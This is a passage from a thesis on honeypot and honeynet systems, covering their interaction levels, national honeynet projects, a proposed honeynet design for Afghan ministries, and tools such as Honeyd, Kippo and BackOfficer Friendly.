Implementing honeypot systems in different ways depends on what we want todo with it. Learning from attackers in action, about their tools, technologies, andtactics. According to our needs we can implement a honeypot system. For moreinteraction with attacker needs a complex honeypot implementation to emulate op-erating systems, services in operation for example if an attacker connect to it act asa real server or service.

These flexibilities in interaction of honeypot systems functionalities categorizedthe honeypot systems by level of interaction. The measures that compare betweenthe honeypot systems are according to the level of interaction that an attacker dowith the honeypot systems.

Low-Interaction Honeypot Systems

The level of interaction in this type of honeypot system is low, implementation iseasy and simple. It’s like a service running on a host, configured to emulate someoperating system and services virtually. For example it emulate a virtual operatingsystem with some services which seems vulnerable to attack. When an attackerattack to that system and start interacting at first the low-interaction honeypotcapture the date and time of the attack then source IP address and source portnumber and destination IP address and destination port number and collect someother information according to the technology being used. Services like SSH, Telnet,FTP are mostly emulated with low level of interaction with the attacker.

We can build a virtual network containing servers, switches and routers but withlimited functionality. Finally it has a simply lightweight implementation with lowrisk and limited information gathering.

Medium-Interaction HoneyPot Systems

It’s a combination of low-interaction honeypot system and high-interaction honey-pot system and has more ability than low-interaction honeypot system but less func-tionality than high-interaction honeypot system. For example in medium-interactionhoneypot system when we build a virtual IIS server including some other function-alities, higher privileges and interaction is higher than low-interaction honeypot sys-tems.

Chapter 3 16


Implementation of medium interaction honeypot is more complex and time con-suming. The risk will go high if something goes wrong. Collecting of informationis higher than low-interaction honeypot system. Sometime the attackers may haveinteraction with real systems. Finally more complex to implement, more time andmore resources instead have more information, more activity and interaction andcapturing worms and lots critical information about the attackers.[16]

High-Interaction Honeypot Systems

The most complex honeypot systems that can do anything belongs to the honeypotconcept is the high-interaction honeypot system. Everything for tracking an attackerthat interact with the honeypot system can be done with this type of honeypotsystems. Because the attacker interact with the real systems and services and cando whatever he wants. Implementing of this type of honeypot is the most complex,time consuming procedure and require the most resources than the other types ofhoneypot systems.

The risks with this type of honeypot systems are the most because if an attackertakes the control of the honeypot can attack to the other system or resources. In thesecases usually high-interaction honeypot systems placed behind a firewall to controlthe inbound and outbound traffic to the high-interaction honeypot system.[13]

3.4 Honeypot Systems Policy

If we want to have an effective implementation of a honeypot system we defineour policy before implementing of a honeypot system. Ask ourselves what we needfrom implementing the honeypot system what issues are important to cover them.Because honeypot systems are not used in a single purpose or target. It can beimplemented for different jobs. We must define these policies before implementationof honeypot systems.

For example when a honeypot system is used for detection its value is to detectingunauthorized activity like scans, probes or attacks. Another important issue is aboutauthorization of using honeypot systems in organizations. Maybe an organizationallow to use honeypot systems for detecting scans and attacks but do not allowresearch honeypot to capture keystrokes and even conversations on an online chat.

These issues must be define before design and implementing of honeypot systems.Finally implementing honeypot system needs professional security administrators toimplement and design for their special purposes.

3.5 The Value of Honeypot Systems

After understanding the definition and types honeypot systems it is time to focuson the value of honeypot systems. As discussed before the value of the honeypot

Chapter 3 17


system is that what we want from implementing of it. Because unlike intrusiondetection systems and firewalls does not focus on a specific problem. Instead it isa technology that covers all the security architecture. Honeypot systems have itsspecial advantages and disadvantages and will be discussed in next sections.[19]

Advantages of Honeypot systems

Honeypot systems are lightweight technologies used to gain information about theattackers. Recording information is about location, behaviour and technologies thatare used and also more information are gathered according to the level of interac-tion you implement. Design and implementation is easy few steps to configure butincrease the complexity according to level of interaction and purposes you want toimplement.

The strongest advantage is unlike intrusion detection systems and firewalls neverrun out of resources maybe the buffer of and intrusion detection become full anddrop the packets and also the table of firewall become full and cannot recognizemore connections. Honeypot systems never face to these kind of problems. Becausehoneypot systems are dealing with actions that directly related to it.

Value of data being captured by honeypot systems are higher than any otherdata which captured by the firewall, intrusion detection systems. Instead of logginggigabytes of data every day most of the honeypot systems collect several megabytesof high value data per day. The data is about scans, probes, attacks or according topurposes that is implemented for. It will give an easy quick understand format toanalyze the data.

Disadvantages of Honeypot systems

By having those efficient advantages you may think that it’s great. But everythingwhich has advantages also has disadvantages. About the disadvantages of honeypotsystem when an attacker attack and interacting with virtual systems and servicesmaybe understand that it is a honeypot system. Start attacking directly to honeypotsystem and take the control of honeypot system and used against the organization asa powerful weapon. Honeypot systems are capturing only information that interactedwith it, maybe the attacker attack to other systems in our network not with thehoneypot systems. The risks that a honeypot system will face is according to thelevel of interaction being built in environment. Finally these were the disadvantagesof honeypot systems. [10]

Chapter 3 18

Chapter 4HONEYNET SYSTEMS

Honeynet is one of the primary technology used by security communities for in-formation gathering. This chapter will discuss the definition of honeynet that whatis honeynet system its values and some other subtitles related to the honeynet sys-tems. Covering some important honeynet technologies that are in use at the time ofwriting this thesis is one of interesting goals which the writer of the thesis look forand will be achieved. Important hoenynet technologies that are in use today meanthe running honeynet systems in some countries for knowing their enemies and somesecurity communities for information gathering and study the attackers technologies,methods and motives for the purpose of increasing the network security. One of theimportant difference between honeynet system and most of the honeypot system isthe using of real systems in honeynet for interacting with the attackers.

4.1 Difinition of Honeynet Systems

Honeynet is a designed network with intentional vulnerabilities to invite attackersfor information gathering and studying their activities, methods and motives forthe purpose of increasing the network security. A honeynet is made of one or morehoneypot systems. Honeynet sytems usually use real system and services and seemslike a normal network a worthy target for the attackers. When it has real system andservices this mean that honeynet systems are high interaction and use real systems,applications and services for interacting with the attackers and there is no emulatedoperating system and services here everything is real. Since it doesn’t serve anyauthorized users all the attempt to contact the network is illicit attempt.

4.2 Overview of Honeynet Systems

As we learned honeypot systems in details in previous chapter, now its good to havean overview about the honeynet systems. Conceptually honeynets are a network thatmade of one or more honeypot systems. In information security there are many othermechanisms such as Firewalls, Intrusion Detection Systems, Encrytion systems toprotect assets or the resources of an organization as much as possible. For detectingany vulnerability or threat and defend against them. The primary purpose or goal

19


of honeynet system is to gather information on threats and this information hasdifferent values for the different organizations. In here you will see some examplesof different values of honeynet systems for the different organizations.

• Academic research institution use honeynet systems to gather information forresearch purposes like worm activities.

• Security organizations use honeynet systems to capture information and analysemalwares for Anti Virus, Intrusion Detection systems Signatures, Learn new typesand ways attacks or new types of threats to build and design countermeasures againstthem.

• Government organizations use honeynet systems to learn more about the enemiesand who is targeting them and why.

• Internet Service Providers use honeynet systems to capture information and anal-yse to terminate botnets that are on their networks.

• Security responders use honeynet systems for research and incident response.

Many other types of organization use from honeynet systems depending on theirneeds. The important value of the honeynet system is the information that it gather.The information may has different values according to purpose of using of honeynetsystems means who you are, what you need from implementing of it. This show agreat value of honeynet systems which is a single technology used for multi purposes.

4.3 Countries That Use Honeynet Systems

As we all know it is very important that a country know its enemies all over theworld. In real world a country has many different military and secret organizationsfor preparing security to its people and society. In cyber world also it is important forall countries to check and monitor what is going on cyber world. Being aware whatis happening there. Most of the powerful countries implemented many differenttechnologies for these kind of issues and having their cyber police for preparingsecurity in cyber world and fighting against cyber crimes.

This thesis is going to introduce some of countries that use from honeynet systemsfor providing security in the case of new types of attacks or new types of threats andvulnerabilities and information gathering about the attackers. As discussed beforemost of the countries implemented honeynet systems for providing security such asIran, Pakistan, India, Saudi Arabia, Germany, Polish, United Kingdom these areelected as instances for this thesis. It is very nice to have a brief introduction aboutthem in the following subsections.

Chapter 4 20


4.3.1 IRAN

It was founded in Jan 2010. Their aim is to provide information gathering aboutnew and active security threats or vulnerabilities in the today’s Internet. Learningthe technologies and tools, tactics and motives involved in computer and networkattacks and share the learned lessons. The main areas that they focus and interestedto research:

• Malware Analysis

• Botnet Detection

• Web Honeypots

• Client Honeypots

• And etc...

• Its Address is: http://www.irhoneynet.org

Figure 4.1: The Iran Honeynet System

4.3.2 PAKISTAN

The goal of Pakistan honeynet system is to learn and raise awareness about themotives and tactics of the Black Hat community that targeting Pakistan’s internalnetworks.

Chapter 4 21


Sharing knowledge and the various technologies and tools that hackers uses onthe Internet today is also the aim of Pakistan honeynet system. Providing servicesto the federal government, private sectors, state and local governments and highereducation establishments inside the country.

The Pakistan honeynet focuses on the awareness of the threats and vulnerabilitiesthat exist on Pakistan’s network today.

• Its Address is: http://www.honeynet.pk

Figure 4.2: The Pakistan Honeynet System

4.3.3 INDIA

Lets have an introduction to the Indian Honeynet Project it is a chapter of theHoneynet Project. It has professional and experienced members from large IT or-ganizations in India. This members are from different categories for example someof them directly or indirectly working with the Law enforcement, Defence and Cy-bercrime under the Government of India, technology specialists, students and dis-tributed Honey network across India to help research and report their learning fromthe honeynet systems community. Everyone here that work on the project is freeand voluntarily.

• Its Address is: http://www.honeynet.org.in

Chapter 4 22


Figure 4.3: India Honeynet System

4.3.4 SAUDI ARABIA

Saudi Honeynet Project aims for providing a cool information gathering aboutsecurity threats and vulnerabilities that currently active in the networks of the King-dom of Saudi Arabia (KSA). Its goal is to learn new types of technologies, tacticsand motives of the attackers and share these learned lessons to the public and widerIT community. They use from honeynet systems because network security is a toppriority.

• Its Address is: http://www1.kfupm.edu.sa/honeynet

Chapter 4 23


Figure 4.4: Saudi Arabia Honeynet System

4.3.5 GERMANY

About the German Honeynet Project that most of the members are from Univer-sity of Mannheim (Laboratory for Dependable Distributed Systems) and work ontheir PH.D thesis. They implemented different honeynet systems for different tasks.They research about different kinds of malwares and developing countermeasuresagainst them.

• Its Address is: http://www.honeynet.org/node/368

Chapter 4 24


Figure 4.5: German Honeynet System

4.3.6 POLISH

Introduction to the Polish Chapter of the Honeynet Project that was founded inNovember 2011. This chapter is built by young people for sharing their experiencesand knowledge of various areas on network and computer security. They developvarious technologies for honeypot systems both server side and client side for fightingagainst Internet malware. Their honeynet system are located in 70 different parts ofthe country for monitoring the malicious activity in Polish networks.

• Its Address is: http://pl.honeynet.org

Chapter 4 25


Figure 4.6: The Polish Honeynet System

4.3.7 UK

The last example is about UK Honeynet Project which is a Chapter of the Hon-eynet Project that was founded in 2002. The UK aim is to provide informationgathering about new types of security threats and vulnerabilities that active in theUK networks today, to learn the technologies and tools, the tactics and motives ofthe black hat community and share these learned lessons to the public and wider ITcommunity.

• Its Address is: http://www.ukhoneynet.org

Chapter 4 26


Figure 4.7: The United Kingdom Honeynet System

4.4 Security Communities That Use Honeynet Sys-

tems

There are many network security organizations and companies around the world.Most of them use from Honeypot and Honeynet Systems for their researches in thecase of gathering informations about new types of threats, attacks and vulnerabili-ties. They may use these informations to develop countermeasures or other securityproducts. Some of the organizations have online real time maps that shows thelive attacks that are in action in the world and in here it is nice to have a shortintroduction to some of them which is very popular in the world.

4.4.1 THE HONEYNET PROJECT

It is an international non profit security research organization that founded in 1999. This organization research or investigate on the latest attacks and developing opensource, security technologies and tools to improve Internet security. It has manyvolunteers around the world for fighting against malware and discovering new typesof attacks and creating security technologies and tools that may used by businesses,governments or military organizations all over the world. This organization researchand work for analysing of the latest attacks and aware public people and leadingsecurity professionals about new threats across the world. [3]

Research

Chapter 4 27


The volunteers that work in Honeynet Project their security research is aboutcovering data and analysis them, information gathering about attackers and mali-cious software that the attackers use. Also they cover additional information aboutthe attackers such as motives in attacking, how the attacker communicate, whenthe attackers attack the systems and what action they did on the target system.These services provided through the white-papers known as Know Your Enemy bythe Honeynet Project. Everything will be Post to the Honeynet Project website.[3]

Awareness

One of the most important services of Honeynet Project is security awareness. Allthe members of the Honeynet Project all over the world they educate the publicabout the new threats to the systems or information. They aware the people aboutthreats and vulnerabilities that exist on the today Internet. By providing theseinformation to the public so people can better understand that they are a target andunderstand about the basic countermeasures they can take to fight against thesethreats. Also about the advanced threats that exists and the defences. Finally theseinformations also distributed among the people by the Know Your Enemy series ofpapers.[3]

Tools

Another very important service of the Honeynet Project is developing and expand-ing security technologies and tools. Some of the recent technologies examples includeCuckoo, Capture-HPC, Glastopf, HoneyC, Honeyd, Honeywall and etc. Also thesetechnologies and tools provided through the Honeynet Project site. For organizationsthat is interested in continuing their own researches about the cyber threats.[3]

• Its Address is: http://map.honeynet.org/

Chapter 4 28


Figure 4.8: The Honeynet Project

4.4.2 THE NORSE

One of global leader in live attack intelligence is Norse. It delivers continuouslyupdated, new and unique Internet and darknet to help organizations for detectingand blocking attacks that other systems miss. It detects new threats by traditionalthreat intelligence tools. It covers millions of dark sensors, honeypots, crawlers andagents deliver unique visibility into the Internet.

• Its Address is: http://map.ipviking.com/

Chapter 4 29


Figure 4.9: The Norse Honeynet Project

4.4.3 THE FIREEYE

FireEye has invented a virtual machine based security platform to provide a realtime threat protection to enterprises and governments worldwide against the nextgeneration of cyber attacks. It uses dynamic threat intelligence to identify and blockcyber attacks in real time and FireEye has cover 2500 customers across more than65 countries.

• Its Address is: https://www.fireeye.com/cyber-map/threat-map.html

Chapter 4 30


Figure 4.10: The FireEye Honeynet System

4.4.4 THE GLOBAL BOTNET THREAT ACTIVITY

Trend Micro is a global leader in IT security. With over 25 years of security exper-tise, develops innovative security solutions that make the world safe for businessesand consumers to exchange digital information. It recognized as the market leaderin server security, cloud security and small business content security.

• Its Address is: http://www.trendmicro.com/us/security-intelligence/current-threat-activity/global-botnet-map/

Chapter 4 31


Figure 4.11: The Global Honenet System

4.4.5 THE WORLD MAP

F-Secure has a comprehensive online technology for everyone who interested inunderstanding the world virus situations at a glance. It is developed for researchpurposes and is available to the general public in four languages. The visitors firstsee the full world map situations but they can quickly search for information basedon a geographical area or country.

• Its Address is: http://worldmap3.f-secure.com/

Chapter 4 32


Figure 4.12: The WorldMap3 Honeynet System

4.4.6 THE KASPERSKY MAP

Kaspersky has an interactive cyberthreat map that visualizes cyber security inci-dents that happening worldwide in real time. It provide a global map that users canrotate and zoom in to any part of the world to get a closer look. Kaspersky organi-zation detect real time threats and differentiate them with different colours and giveshort description about threats on the screen. This organization used these gath-ered information to develop countermeasures for unknown and new types of attacks,threats and vulnerabilities on its security technology productions.

• Its Address is: http://cybermap.kaspersky.com/

Chapter 4 33


Figure 4.13: The WorldMap3 Honeynet System

4.5 Honeynet Systems For Afghanistan

Now we come to the suggested solution for Afghanistan to secure the its internalnetworks. As before discussed about this issue that the important motives of thisthesis was securing the internal networks of Afghanistan, recognizing the enemiesof Afghanistan and their actions, showing our ability to the others that we can doeverything in highest level and how to defend against the attackers.

In here it must be shown clearly that what this thesis going to suggest as the bestsolution for Afghanistan to secure its internal networks against attackers. Previoussections of this chapter was about countries and organizations that they use fromthese concepts to protect their internal networks and research about new types ofattacks, threat and vulnerabilities and also cover a brief introduction to them. Thissection is going to have the best solution for Afghanistan internal networks especiallyfor Afghanistan ministries such as ministry of interior, ministry of communicationand information technology, ministry of higher education and the others with theirsubcategories.

It is very important for a country to protect its internal networks against attackers.To know that who is attacking, how an attacker attacks, what the attackers tryingto achieve and finally learn how to defend against the attackers. By implementinghoneypot and honeynet systems together with other security mechanisms it is pos-sible to track the attackers and know these things about the attackers. It is possibleto know what kind of tactics and technologies the attackers used against our internalnetworks.

Chapter 4 34


Figure 4.14: The Afghanistan Map

Honeypot and Honeynet Systems can be used effectively in Afghanistan ministriesfor information and network security purposes. Ministry of Interior is an importantministry that everything should be protected there by using of honeypot and hon-eynet system it is possible to detect any malicious traffic or attackers actions to thatnetwork. Also it is nice to use from these concepts for other important ministries likeministry of communication and information technology, ministry of higher educationand other organizations that is important and has sensetive informations.

Chapter 4 35


Figure 4.15: The Afghanistan Ministries

The solution of this thesis for Afghanistan is to use from high interaction hon-eynet systems for its important ministries to protect assets and detect attackers ormalicious network traffics. As you see in the solution diagram the honeynet placedbetween Internet and firwall and as discussed before that for high interaction hon-eypot real operating systems must be used for full interaction with the attackers.Designing a high interaction honeynet systems with real operating systems can bedone by two different ways.

The first way is using separate physical systems for each high interaction honeypotsystem and then make a network between them to build a high interaction honeynetsystem. The second way is using from virtualization concept one powerfull server formany operating systems to build a high interaction honeynet systems. Then connectthis honeynet network to the router which connected to the Internet and internalnetwork. Also it is possible to design the honeynet in some other ways for exampleput honeynet system between the Internet and internal network to sniff all the trafficthat comes from the Internet to the internal networks and back. With this designevery packet will be checked and once any types attacks detected. The honeynet willstart interacting and capturing the conversation between the attackers and honeynetsystems. The solution diagram is shown in figure 4.16.

Chapter 4 36


Figure 4.16: The Best Solution For Afghanistan

Chapter 4 37

Chapter 5HONEYPOT AND HONEYNETSYSTEMS TECHNOLOGIES

This chapter focus on important honeypot and honeynet system technologies thatare in use at the time of writing this thesis. Covering both commercial and freetechnologies with details. We will begin our chapter with introducing of Honeyd(Honey Daemon) which is a cool technology regarding of honeypot systems. Honeydis open source and and easy to use. It works with Unix systems and has commandline interface.

Using a variety of open source and close source software throughout this thesisprocess with appropriate hardware. And mainly focused on open source solutionbecause its features and benefits that the source code is open and everyone cancustomize and use according to his own targets.

5.1 Honeyd (Honey Daemon)

Honeyd is an open source low interaction honeypot system developed by NielsProvos of university of Michigan. The first release was in 2002. This is a freetechnology that you can download and use. Honeyd emulate the services of a realoperating system. This is one of the well-known low interaction honeypot systemsthat operate on Unix platforms. Its a good starting point for entering to the knowl-edge of honeypot systems. Because it is easy to install, configure and understand itslogic. It is used as a production honeypot system. Since it is a low interaction hon-eypot there no real operating system installed in Honeyd and they are are servicesrunning on it and emulating different kinds of operating systems and services. Whilethis is open source you can highly customize the honeypot system to cover yourrequirements. Also you can use from other customized versions that are developedby other people or security communities.

Its configuration is easy everyone can design and create their own services anddecide that what emulated services run on it which ports to open for listening. Youcan easily design an emulated network including routers, switches and different types

38


operating systems and design different services to run on these emulated equipment.There is no real operating systems and services that an attacker trying to gainaccess on it everything is designed virtually. Honeyd detect attacks and unauthorizedactivities and capture their interactions with the honeypot systems.[1]

5.1.1 Value of Honeyd

Honeyd is primarily a production, low interaction honeypot system. It works thesame as other models of low level interaction honeypot systems but with some morespecial characteristics that makes a big difference between them. When an attackertrying to connect to an emulated open port on Honeyd. The connection is logged andthe Honeyd start capturing the attackers activities and interactions and generate analert.

There are two other advantages that increase the Honeyd values. The first ad-vantage is detecting connection on any TCP port. Because the emulated servicesare not required for detection and they only exist for interaction with the attackersto gain and capture more information. The second advantage of Honeyd is beingable to modify their emulated services and level of interaction. Since it is opensource you can modify and customize the Honeyd according to your needs also thesecurity community works for improvements of Honeyd they add new useful featuresto the Honeyd honeypot system and distribute. For example emulating InternetInformation Service (IIS) web server developed by the well-known security experts.

Another greatest value of Honeyd is the ability to monitor millions of IP addressesat the same time. Listening to the ports and level of interactions with emulatedservices. Honeyd can only monitor IP addresses assigned to the honeypot system.There is an issue here that there are a small number of IP addresses for Honeyd tomonitor them. But it has the ability to monitor millions of IP addresses. Activelyclaimed to monitor thousands of IP addresses at the same time.

You may think how much Honeyd is complicated to configure and implement tomonitor millions of IP addresses. How to identify each IP address for Honeyd tolisten for attacks and it would be massively time consuming process. It is not likethat. Honeyd solved this problem that instead of listening to a single IP addressor specific IP addresses. Honeyd monitors entire network blocks for IP addressesthat are not in use. When a attacker try to connect to an IP address that has nosystem then the connection will be forwarded to the Honed honeypot system. Afterreceiving connection from the attacker replies to the attacker and start capturing theinteraction between attacker and Honeyd.

Monitoring level on noise on the internet, including worms, exploit tools and tech-nologies automated attacks, denial of service attacks and distributed denial of serviceattacks are the things that can be detected using Honeyd technology. These some ofthe values of Honeyd honeypot system in general. One more thing which remain isdetecting new types of worms, attacks and threat with their methods. These kinds

Chapter 5 39


of honeypot systems can be use for designing countermeasures for tomorrows threatwhich is the title of the thesis.

5.1.2 How Honeyd Works

Now it is nice to have a discussion about how Honeyd honeypot system works.When an attacker attacks to an IP address which is not exist in a real system.Honeyd assumes the identity of the attacker and start interacting with the attacker.It doesn’t do this by assigning thousands of IP addresses to itself at once. Insteadof this Honeyd only has one IP address that is assigned to a single interface and thisis the same interface used for management and administering the honeypot system.Also monitoring for suspicious activities of the attackers with that interface too.

When an attacker attacks to a system that is not exist. The traffic is routedto Honeyd Honeypot system. Honeyd starts running the emulated services afterreceiving the connection. Also capturing the interactions between the attacker andthe Honeyd honeypot system. Honeyd captures all the activities such as probes, scansor attacks. From the Honeyd side the attacker is a victim for honeypot system.

At the time Honeyd receives more attacks it repeat the before processes for all theattackers. Starting emulated services and put them under the attacks of attackersand interacting with different attackers all at the same time. In here there is matterhow do you know which systems do no exist and how does the Honeyd honeypotsystem receive the attackers activities because Honeyd doesn’t actively identify non-existent systems. The issue is that we have to route traffic of the attackers fornon-existent systems to the Honeyd Honeypot system. There are two solutions forthis issue or matter.

The first way is black holing when you want that Honeyd to monitor the entirenetwork that has no active systems. That an attacker targeting to what IP addressin a specific network and we know that it is an attack because the network has nolive systems. Thus we are able to route the traffic of the entire network directly tothe Honeyd honeypot system.

The second way is to have the Honeyd honeypot system reside on a network thathas both valid and non-existent systems. Most of the networks in organizations areimplemented like this structure. They have both real systems and also unassignedIP addresses within that network. Here the goal is to directly route the traffics ofnon-existent systems to the Honeyd honeypot system.

5.1.3 Interacting With Attackers

Once the Honeyd receives the attacker’s initial connection with the ways thatexplained before. Honeyd waits for the attackers to see what ports the attackersattempt to target Honeyd. One of the several thing that may happen here is thatHoneyd may not have a service emulator for the targeted port. In that case the

Chapter 5 40


Honeyd may generate a reply that the requested port is closed or may not reply atall related on how the Honeyd honeypot system configured. However the Honeydmay allow to detect activities on any port that the attackers attempt. Or maybeHoneyd configured to interact with the attackers using emulated services.

For example if an attacker trying to connect to the TCP port 123 the Honeydhoneypot system reply with an RST packet then declare the port is closed and logthe attempt. However if an attacker connects to the TCP port 80 the honeypot sys-tem can initiate a Web server emulator and start interacting with the attackers andcapturing all the activities. There are also several other advance options for inter-acting with the attackers that they will be discussed in the practical implementationchapter when configuring the Honeyd honeypot system.

Honeyd has its unique abilities for emulating operating systems at not only theapplication level. Also it has the ability of emulating at the IP stack level too.With the Honeyd when an attacker trying to communicate with an emulated servicelike Web server the emulated service behaves differently according to the selectedemulated operating systems and scripts. With Honeyd you can see how a Web serverbecame a Microsoft IIS Web server or Apache Web server according to the emulatedoperating system was Microsoft based or Unix based. Honey has the capability toemulate a Unix based that IP stack can act as a Unix IP stack and also if it emulatesa Cisco router then the IP stack can act as the Cisco router IP stack too.

5.2 Kippo

Kippo is a medium level interaction Honeypot that emulate SSH server. It providesan interaction shell to the intruder while monitoring and capturing all the activities.A little information about Secure Shell (SSH) it is a network protocol which providesencrypted communication between two devices. SSH server allows users to gainaccess to remote devices through a shell or interactive command line interface in asecure manner. Port 22 is used by SSH protocol by default. The clients usuallycan access to an SSH server by entering a valid username and password through anSSH client tool. From that point or perspective SSH servers are very vulnerable topassword attacks. [2]

The password attacks especially dictionary or brute force attacks are very commonand quite easy to be launched even by unqualified attackers on SSH servers. Thesetypes of attacks are based on the fact that many users choose their credentials from asmall domain. In here brute force attacks try all the possible username and passwordcombinations until the correct password is found in an automated way. This attributecould be very useful for SSH server honeypot implementations. In order to have asmany successful logins as possible in our SSH honeypot it is preferred to choosecredentials that rely on automated dictionary attack tools.

Chapter 5 41


5.2.1 Features of Kippo

Python is the language that Kippo is implemented in. As it was discussed beforeKippo basically emulate an SSH server on port 22 and logs or capture all loginattempts to that port. Whenever a login is successful kippo monitors all the inputcommands of the attacker and replies to these commands in order to convince theattacker that interact with a real system. More specifically about the features ofKippo Include:

• Kippo provides a fake file system that the attackers can add or remove files withthe appropriate command.

• Kippo provides saving files that have been downloaded or stolen by the attackerswith the command wget in a specific secured folder.

• Kippo provides fake output for some specific commands for instance useradd,and etc.

• Kippo provides and tries to fool the attackers with some reactions to specificcommands for instance exit command does not work which means that the attackerthinks that has disconnected but still can be monitored by Kippo.

• Kippo provides all the sessions are recorded and can be easily replayed with theinitial timestamps.

• Kippo provides that all records are kept in an SQL database.

5.2.2 How Kippo Works

As it is mentioned before that Kippo records all the useful information in a logfile but also in an SQL database. The main tables of the database include:

• Authentication Table: Containing information about the login attempts, thetimestamps of the attempts and also username and passwords that have been used.

• Client Table: Which contains information about SSH client version that hasbeen used.

• Input Table: With information about the input commands that have beenentered. Also in that table we are going to have information about the session id,the timestamps and additionally if the command was successful or not.

• Session Table: Containing information about the id of the connection the du-ration and timestamps of the connection and the IP address of the attackers.

Chapter 5 42


• Sensor Table: Providing information about the SSH server and the IP addressof the host.

• TTYlog Table: Finally this table contains information about how to replaysessions with the corresponding timestamps.

5.3 Conpot

Conpot is a low interaction honeypot technology. It is open source all of the codesare available and it is easy to deploy, modify and extend. It can emulate complexinfrastructures. Finally it is a server side Industrial Control systems honeypot tech-nology and provide a range of common industrial control protocols created the basicsto build your own system. Conpot is developed under the umbrella of the HoneynetProject and on the shoulders of a couple of very big giants.

5.4 Dionaea

It is a low interaction honeypot system technology. Its Dionaea intention or goal isto trap malware exploiting vulnerabilities exposed by services offered to a network.The Ultimate goal is gaining a copy of the malware.Dionaea can provide services via TCP/UDP and work with IPv4 and IPv6. Thelanguage that Dionaea technology developed is Python powerful Scripting Language.

Dionaea technology has some modules for emulating services. For instance SMB,HTTP, FTP, TFTP, MSSQL, MySQL and SIP(VoIP). Dionaea technology has someother tools on it that while interacting with the attackers also trying to copy themalware.

5.5 HoneyWall

At first it is nice to mention that the purpose of the Honeywall CDROM technol-ogy is to make a honeynet deployments easy, simple and effective. The HoneywallCDROM technology accomplishes this by automating the process of deploying ahoneynet gateway that also know as a Honeywall. The Honeywall CDROM technol-ogy also provides tools to easily configure, maintain and analyse the solution after ithas been deployed. Honeywall CDROM technology is often the most and complexelement of any successful honeynet deployment.

Honeywall CDROM technology goal is to capture, control and analyse all theinbound and outbound honeynet activities. Building a Honeywall is a difficult andmanually intensive process, requiring the combination of the various technologies.Fortunately the Honeynet Project has attempted to combine all of the these elementsinto a single, bootable installation CDROM. After installation, minor configurationwill be required in order for the system to be fully functional.

Chapter 5 43


5.6 HoneyBot

HoneyBOT technology is a medium level interaction honeypot for Windows. Hon-eyBOT technology is an easy to use solution ideal for network security research. Thecapturing and logging capability of a honeypot is higher than any other network se-curity technology and captures raw packet level data even including keystrokes andmistakes that is made by the attackers. The gathered information is highly valuableas it contains only malicious traffic with little to no false positives.

HoneyBOT technology works by opening a range of listening ports on the im-plemented system which are designed for vulnerable services. Once the attackersconnects to these services they are fooled into thinking that they are attacking toa real system or server. The HoneyBOT technology safely captures all communica-tions with the attackers and logs these results for future analysis. The attacker mayattempt an exploit or upload a rootkit, malware, worm or trojan to the server inHoneyBOT technology environment can safely store these files on the implementedsystem for malware collection and analysis purposes.

5.7 BackOfficer Friendly

Another cool honeypot system technology which will be discuss is BackOfficerFriendly or called BOF. One of the simplest Windows or Unix base honeypot systemand its functionality is remarkably easy to configure and understand. Because of itssimplicity some of the security professionals do not accept this as a true honeypotsystem. However that this simplicity makes the BOF an excellent technology andeveryone can use it. It is selected for inexperienced security administrators to becomean excellent introduction to the concept of Honeypot systems for them.

BackOfficer Friendly is a low interaction honeypot system developed in 1998 byMarcus Ranum that can run on Microsoft and Unix even it was made primarilyfor windows base systems. BOF run on all Windows base Operating Systems fromWindows 95 to Windows 8.1 and this compatibility of BOF makes it an excellentsolution for desktop systems including home users. BOF can emulate up to sevenemulated services and unlike the Honeyd there is no customization option and thefunctionality is limited instead it was designed as a response to a specific threat.

At first BOF was designed to detect some specific Trojans that was distributedamong the networks in many organization. Whenever attackers scanning the networkor a specific system the BOF generate an alarm. Then additional services added forincreasing detection capabilities. When the attackers run an automated scan againstour network the BackOfficer Friendly start producing a string of alerts and makeobvious what occurred to the network. There is one important issue when you wantto install on Unix systems you have to download the source code then compile andinstall it yourself.

Chapter 5 44


5.8 The Value of BOF

As you understand that BOF is a low interaction honeypot system you must knowthat depending on the classification it is a production type of honeypot system.About the value of BOF it is obvious that increase the security of the organizationsnetwork by detecting and alerting to the attacks. There are seven preconfiguredservices that BOF cat detect the attacks when a communication or connection ismade to each of these seven services the interaction will be capture and logged alsoan alert is generated too. This limitation in emulating of services in BOF only coverthe functionality of the services. For example when it emulate a Web server it onlycapture the attempts to get a Web page but it doesn’t emulate a specific Web serverlike Apache or IIS. Additional services cannot be added or customized depending onour needs. BOF is limited to detecting attacks just on the seven ports that BOFmonitors. Unfortunately if an attacker attacks to another port BOF doesn’t becomeaware of the attacks and the attackers activities and these kinds of limitation iscommon to the most of low interaction honeypot systems. [? ]

Its difficult to prevent attacks with the BOF because of its limitation of interactionwith the attackers. Also BOF even when it detect an attack it gives us a little infor-mation about what the attacker is doing and what kind of technology the attackerusing or what is the target of the attacker from attacking in this case once the BOFalerts you to an attacker’s activities other technologies are required to respond to theattacks. The information will be captured once the an attack is detected the infor-mation is about IP address of the attacker and the targeted port time of the attacksand some of the services can also determine the type of attacks. These were the thevalues of BackOfficer Friendly a small honeypot technology with limited services.[?]

For configuring the BOF honeypot system double click on that icon you will get tothe BOF console. All the configurations, maintenance, logs and alerts happen witha single graphical user interface which makes the BOF a simple solution for everyoneto use. Next what you want to configure, do you want to automatically start, whatservices you want to listen on, what services you want that BOF emulate everythingis easy to configure. The first important option is running BOF at the start-up andits highly recommended that you should configure it. Because if BOF is not runningcannot detect any attacks. If you want to do it manually on every reboot may youforget sometimes to start the BOF. In BOF you have just seven services to selectfrom for listening and it doesn’t have any other option to create you own services orport listeners. Here are the seven services of the BOF.[? ]

• FTP (File Transfer Protocol)As you know it is a protocol used to transfer files and listens on port TCP 21. Thisis an important common service that most of the attackers will target and you willsee a great number of activities and interactions with this port.

• Telnet

Chapter 5 45


A mostly used protocol for administering system remotely and it listens on port TCP23.

• SMTP (Simple Mail Transfer Protocol)This protocol used for sending and receiving e-mails and listens on port TCP 25.

• HTTP (Hyper-Text Transfer Protocol)A common protocol use for Web connections or World Wide Web and listens on portTCP 80. But there is no option or functionality to listen on port TCP 443 knownas Secure Socket Layer (SSL) port for encrypted Web Connections.

• POP3 (Post-Office Protocol)A protocol used by clients to retrieve their e-mails and listens on port TCP 110.

• IMAP (Internet Message Access Protocol)This protocol also used by clients to retrieve their e-mails and listens on port TCP143.

Finally there are many other technologies exist related to the Honeypot and Hon-eynet systems both open source and close source. Everyone can search about themon the Internet and implement them according to their needs. In here prefer theopen source technologies because they are free and customizable and everyone candevelop and customise these technologies according to their organizations needs.

Chapter 5 46

Chapter 6DESIGNING COUNTERMEASURESFOR TOMORROWS THREATS

